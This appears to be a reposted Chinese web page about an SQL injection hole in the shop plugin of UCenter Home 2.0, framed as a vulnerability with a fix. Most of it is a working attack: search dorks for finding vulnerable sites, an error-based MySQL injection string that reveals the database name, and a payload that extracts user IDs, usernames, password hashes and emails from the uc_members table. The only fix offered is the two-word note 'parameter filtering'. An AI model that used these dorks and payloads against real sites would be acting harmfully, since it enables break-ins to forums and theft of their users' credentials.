UCenter Home 2.0 shop插件 SQL注入漏洞及修复筹划[网络技术]
本文“UCenter Home 2.0 shop插件 SQL注入漏洞及修复筹划[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
漏洞文件: Shop.php
value's : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Metarials : Hex Conversion
Your Need victim Database name.
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..
DB : Okey.
your edit DB `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okey.
Your use Hex conversion. And edit Your SQL Injection Exploit..
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
修复筹划:
参数过滤
以上是“UCenter Home 2.0 shop插件 SQL注入漏洞及修复筹划[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |